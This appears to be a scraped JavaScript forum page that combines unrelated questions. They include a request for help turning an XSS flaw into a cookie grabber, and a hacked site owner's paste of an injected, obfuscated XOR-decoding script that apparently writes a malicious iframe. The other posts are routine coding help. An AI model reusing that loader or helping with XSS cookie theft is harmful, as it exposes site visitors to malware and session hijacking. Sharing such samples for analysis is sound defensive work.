|
JavaScript - Xss Remote Code Execution Vulnerability, How To Exploit?
I have discovered a XSS vuln in a website and I'd like to use this as a cookie grabber. If you can help, <removed>.
Similar TutorialsWe just got pwnd Woke up this morning and several domains that we run had been exploited. Commonly-named files (like "index", "default", "home", "login") had had various chunks of code inserted in them. In many cases, it was just adding an iframe tag at the end of the body, pointing to a particular URL (which was, of course, riddled with nasties). In some cases - seems to have been only on PHP files for some reason - it added a rather more obfuscated bit of JS code, which I've pasted below. I haven't had a chance to have a good look at it yet (it's been a bit of a busy day....) but I'd dearly like to know if it's doing anything more sinister or interesting than simply writing out that same iframe tag, using JS. If you're bored and fancy doing me a favour, which would be massively appreciated, could you have a crack at figuring out what the code below is doing? (NB: Obviously, if it's got a URL in there, it'd probably be wiser not to include that in any reply post) Anyway, cheers for any help. F&$@@*ing hackers Code: function eqfTI(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(eqfTI()>100000){window.name=7473445389879535756597298445746584728357335278753312121855439177458373196524388628821996448346181927;var dUIOwMj='%u0032%u000e%u0067%u0001%u0073%u0012%u007f%u001a%u003a%u004d%u0024%u0040%u0034%u005c%u0061%u0050%u0070%u0018%u007d%u0014%u0073%u001b%u006f%u0052%u0063%u0043%u0021%u004e%u003c%u0058%u003d%u004f%u0072%u0042%u0062%u0004%u0076%u0017%u007a%u001f%u007d%u0012%u0060%u0004%u0061%u0013%u002e%u001e%u003e%u004d%u003f%u005c%u0061%u0046%u002e%u005a%u002e%u005e%u0064%u004b%u0064%u0055%u0065%u005c%u0072%u004b%u007e%u0050%u0061%u0050%u0064%u004a%u0078%u004d%u007c%u0053%u0027%u0043%u0030%u001f%u0076%u0018%u007c%u0019%u0061%u004f%u003f%u0057%u0027%u0000%u003e%u0002%u002d%u0044%u0022%u0050%u0031%u005c%u0039%u0007';var bEmzw=unescape(dUIOwMj);dTcCAbu=window.name;for(gijyoQQZ=0;gijyoQQZ<bEmzw.length-1;gijyoQQZ++){QCTFMG=bEmzw.charCodeAt(gijyoQQZ);document.write(String.fromCharCode( (bEmzw.charCodeAt(gijyoQQZ+1)-0) ^ QCTFMG) );}}
I have code that I have written to clean up the value of a text box before submitting it to a database, the problem I have is that if the value is blank, I want to throw up an alert and halt the JS from continuing, normally I would put in a return false statement and be done, but since the function is already returning a value I was wondering if there was another way to stop code execution. So if cleanString is not blank after it processes code should continue, if it is blank it should stop everything after the alert message. I know I can code for it on the calling side but I was hoping to include it all in one function. If I return false after the alert the output box actually says false and code continues to process. Code: <script>
function cleanString(myString){
//Removes All Special Characters and Double Spaces and trims the text
temp = myString.replace(/[^a-zA-Z 0-9]+/g,'')
temp = temp.replace(/^\s+|\s+$/g, '');
temp = temp.replace(/\s+/g, ' ');
if(temp == ""){
alert('Input string cannot be blank, or contain special characters.');
//Halt Code execution here
} else {
return temp;
}
}
function testan(i){
document.getElementById('output').value = cleanString(i);
alert("still going");
}
</script>
Input: <input type="text" id="input" style="width: 500px;" value=" Test (Parens) [brackets] 1234 2 4 ,Comma "Quote "/><br />
Output: <input type="text" id="output" style="width: 500px;" /><br />
<input type="button" value="Go" onclick="testan(document.getElementById('input').value);" />
ADVICE: the thread titled can anyone decipher this code please on this URL http://www.codingforums.com/showthread.php?t=251191 is the only post to cause my Anti-Virus to kick in to action to prevent a backdoor malware attack. ERRing on the side of caution, I have already "reported" the post. it is my understanding that all lines of code are executed in a "top down" order. (exception: temporary exit/return on functions), even then, when return from function, top down continues on its way. simple enough. so why is this set of instructions jumping forward several lines of code and jumping back to continue execution? Code: 202. var statusIndex=0;
203. $('#cpqcSelect').click( function() {
204. alert('line 204: statusIndex ='+statusIndex);
205. $(this).css({'background-color':'#f00','border':'3px solid #000','color':'#000'});
206. alert('line 206');
207. $.get('getRangeStatus-server-script.php', {data:0}, processResponse );
208. alert('line 208');
209. function processResponse(data,status){
210. if (status == 'success') { statusIndex = data }
211. else { statusIndex = 'error' }
212. alert('line 212; value of statusIndex = '+statusIndex);
213. }; // end function processResponse(data,status)
214. alert('line214');
215. return false; // stop the link from reloading the page or traveling elsewhere
216. }); //end $('#cpqcSelect').click( function()
i'm using the alert() boxes to track how this code is being executed. oddly enough it does not go top down as i think it should. maybe something is forcing it to jump around? i don't know? line 204 fires. ok. line 206 fires. ok. line 208 fires. ok. but then execution jumps into line 214, before it goes into the function on line 209. thats odd? execution goes thru the function and spits out line 212 correctly. then it jumps to line 215. why the jump to line 214 before it goes into the function? i need execution to complete the function at 212 first and then go on. but it doesn't want to do that. possible error causing odd jumping around? would appreciate your eyes, please. thanks, Paul How to know the execution time of a function? For example, which of these functions run in less time? That is, which of these functions are more weightless to run? Code: document.getElementById("my_image").src = "images/picture.png";
//or
document.getElementById("my_image").style.webkitTransform = "rotate(45deg)";
Thanks in advance! Hi, I have a javascript function that is formatting data before it is being passed along to an Ajax call. The same function is formatting data for two variables but it seems as though the first call to the is being preempted by the same function call for the second variable's data formatting. On top of that the function does not seem to finish execution by the time it reaches the Ajax call so none of the data seems to be passed along. Here's a condensed version at what I'm dealing with: Code: var data_group1 = FormatData('type_1');
var data_group2 = FormatData('type_2');
Ajax(data_group1, data_group2);
How can I ensure that the first call to FormatData is finished before the next call to it begins. Additional how can I prevent the Ajax function from executing until the first two lines have executed. Thanks a ton. Say that I've got the following XML Code: <document> <block key="block1"> <p>This is a <bold>paragraph</bold></p> </block> <block key="block2"> <p>Additional paragraph</p> </block> </document> Obviously the schematics of this data and the constraints placed upon them can be described using XSD. For example, the following rules would apply: * must be a document element as the top-level parent element * must be at least one block element as a child of document * each block must have a unique key value * blocks can have 1...n p child elements. * p elements can have 0...n bold child elements What I'm looking for is an engine that executes on the client-side (JavaScript / jQuery) that can parse the XSD and flag any errors. In addition I would also need to be able to interrogate the engine in order to determine what are valid child nodes at a particular level of the XML. For example, the following types of queries might be asked of the engine: * Q: Is the overall XML valid? A: yes / no + report * Q: I'm looking at the element block (key="block2"). What are the valid child elements of this element? A: p (1...n). * Q: I'm looking at the element p in the first block (key="block1"). What are the valid child elements of this element? A: #text, bold (0...n). Determining the valid child elements of a particular element is something akin to how Visual Studio e.g. 2010 uses Intellisense. For example, given a schema Visual Studio let's you know what the valid elements are at a particular position as you type enter the XML. Finally I've mentioned XSD / XML above but we do not necessarily have to be constrained to these technologies so alternative ideas will be appreciated equally as well. Thank you for taking the time to examine my post. I am developing a web page which contains a java script file. Java script file is created using excel tool. My problem is that the execution time of a java script function is very high,mainly in chrome browser. what will be solution to overcome this?
Without elaboration plz see my code: Code: <body>
<script>
var b="s";
</script>
<button target="_blank" onclick="window.open('http://......php?b="javascript:document.write(b);"&id=2&q=<?php print $_GET['q']; ?>','1','');return false;">xyz</button>
</body>
i don understand why this javascript:document.write(b); doesnt work in url... i know its simple yet it make my hair out of my head. plz count it.. Hi, I have a function that I'm trying to modify. It adds an element to the page. The problem is, I require that ClickGeocode() finishes executing before the rest of the code in the function completes. Currently that is not the case... Any ideas? Code: Event.add(window, 'load', function()
{
Event.add('addressSearch', 'click', function()
{
ClickGeocode();
var el = document.createElement('p');
el.innerHTML = " " + addressSearchAddress + " : [" + addressSearchRadius + "]";
Dom.add(el, 'AddressesVisited');
Event.add(el, 'click', function(e)
{
Dom.remove(this);
});
});
});
Hi, I am hosting my website in free server (freehostia.com) and i am using joomla1.5 . I want to parse RSS from my other websites. Joomla does it with its modules. But the server do not allow outbound HTTP request, hence i had use rss-to-javascript website to parse RSS feeds. It parses well but there is its advertisement below the feed (which i think is nonsense). The link it provides is in the format of <script src="http://somethin.com/somdfile.php?parse=.."></script> when i put the link in my browser i see following document.write("string of my parsed xml file with advertisement at end"); What i want to do is get the sting of above line and edit it to chop off the end advertisement. if there was any method to load that output sting in any variable, the task would had been completed. If anybody knows how to do it, please help me. I have a google blogger site on which I want to run a PHP script. The problem is that blogger doesn't have a PHP interpreter. So I was thinking, can I run the php file on a remote server that supports php, and load the result in a div in blogger? Thx! Is there any way to check if exists a cookie from a domain2 in domain1? The purpose here is if the cookie from domain 2 exists then do an action in domain 1. For example: Erase cookie or do an action. Hello, I'm building a very simple app that relies on a remote server. I will use this app on many websites, so I decided to store it on one server (I have control of the remote server in question). I need to make sure that this server is up and running, so in the case it's not I can use a fallback. Would it be a client-side approach? A server-side approach? My guess is to use a js snippet to do the job. If I'm correct, I'll probably use jquery to perfom the task. Regards, -jj. Hi, Im trying to load a remote script but only if a statement is true.. Code: <script type="text/javascript">
var width=screen.width;
if (width>1023);
{
// load remote script
}
</script>
How would I go about this? And will it work if the script in php? Thank youu! EDIT: I realise its probably not the best practice but at the moment im having to use Code: <script language="javascript"> window.location.href = "index2.php?width=" + screen.width; </script> and on index2.php Code: <?php
$res=$_GET['width'];
if ($res > 1024) {
include("header.php");
}
?>
If I use a window opener to open a new window, is there a way to detect that the new window is finished loading before carrying out some other directive in the opener window? Can I access the remote window's onload event from the opener window? I need to know that the website has loaded before moving to the next page. something like: remoteWindow.onload = goToPage(url); Is this even possible? HI I'm new to tinymce. I'm using tinymce with jquery validate with remote Methods. (Remote Methods: http://docs.jquery.com/Plugins/Valid...Methods/remote) I'm using jquery validate to check if email address already has been enter into the database, once it check the email hasn't been entered. It then enter the email with the tinymce textarea. Right now the email address gets enter but tinymce textarea is undefined. I understand I have to uses the var content = tinyMCE.get (editor_id);, but its still enter as undefined, here is my code below: Code: <html>
<head>
<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript"
src="js/jquery.validate.js"></script>
<script type="text/javascript" src="js/tiny_mce.js"></script>
<script type="text/javascript">
tinyMCE.init({
// Location of TinyMCE script
// General options
mode : "textareas",
elements : "editor_id",
theme : "advanced",
theme_advanced_toolbar_location : "top",
theme_advanced_toolbar_align : "left",
theme_advanced_statusbar_location : "bottom",
theme_advanced_resizing : true,
content_css : "css/content.css",
});
<script type="text/javascript">
$(document).ready(function(){
var validator = $("#myform").validate({
rules: {
email: {
required: true,
minlength: 5,
remote: {
url: "test.php",
type: "post",
data: {
dataType: 'json',
email: function() {
return
$("#email").val();
},
content: function() {
return
$("content").val();
}
},
},
}
},
messages: {
sub_name: {
required: "Please enter a email
address",
minlength: "Your email addressmust be
at least 5 characters long",
remote: jQuery.format("Sorry but
'{0}' has already been added. Please try again.")
}
});
});
</script>
</head>
<body>
<form id="myform" action="" method="post">
<input type="text" name="email" id="email" size="15"/>
<textarea id="editor_id" name="editor_id" rows="15" cols="80"
></textarea>
<input type="submit" value="Submit"/>
</form>
Where do I added? Code: var content = tinyMCE.get('editor_id');
content = escape(content.getContent());
content = content.replace("+", "%2B");
content = content.replace("/", "%2F");
thanks Hi, I have a programing problem that have been around for ages. I have search on google using several expressions and words and after hours of digging i'm still unable to do it. I would like to get a value from a HTML page hosted remotely with an inconstant value. Then define this value and name as a javascript variable and apply or show in my page. Thanks for all the help P.S. Is there any way to make a domain lookup in javascript? I mean a user enters a domain and the script converts to an ip and shows to the user. If not thanks, probably it can only be done in the server side... This post will contain a few guidelines for what you can do to get better help from us. Let's start with the obvious ones: - Use regular language. A spelling mistake or two isn't anything I'd complain about, but 1337-speak, all-lower-case-with-no-punctuation or huge amounts of run-in text in a single paragraph doesn't make it easier for us to help you. - Be verbose. We can't look in our crystal bowl and see the problem you have, so describe it in as much detail as possible. - Cut-and-paste the problem code. Don't retype it into the post, do a cut-and-paste of the actual production code. It's hard to debug code if we can't see it, and this way you make sure any spelling errors or such are caught and no new ones are introduced. - Post code within code tags, like this [code]your code here[/code]. This will display like so: Code: alert("This is some JavaScript code!")
- Please, post the relevant code. If the code is large and complex, give us a link so we can see it in action, and just post snippets of it on the boards. - If the code is on an intranet or otherwise is not openly accessible, put it somewhere where we can access it. - Tell us any error messages from the JavaScript console in Firefox or Opera. (If you haven't tested it in those browsers, please do!) - If the code has both HTML/XML and JavaScript components, please show us both and not just part of it. - If the code has frames, iframes, objects, embeds, popups, XMLHttpRequest or similar components, tell us if you are trying it locally or from a server, and if the code is on the same or different servers. - We don't want to see the server side code in the form of PHP, PERL, ASP, JSP, ColdFusion or any other server side format. Show us the same code you send the browser. That is, show us the generated code, after the server has done it's thing. Generally, this is the code you see on a view-source in the browser, and specifically NOT the .php or .asp (or whatever) source code. |
|||||||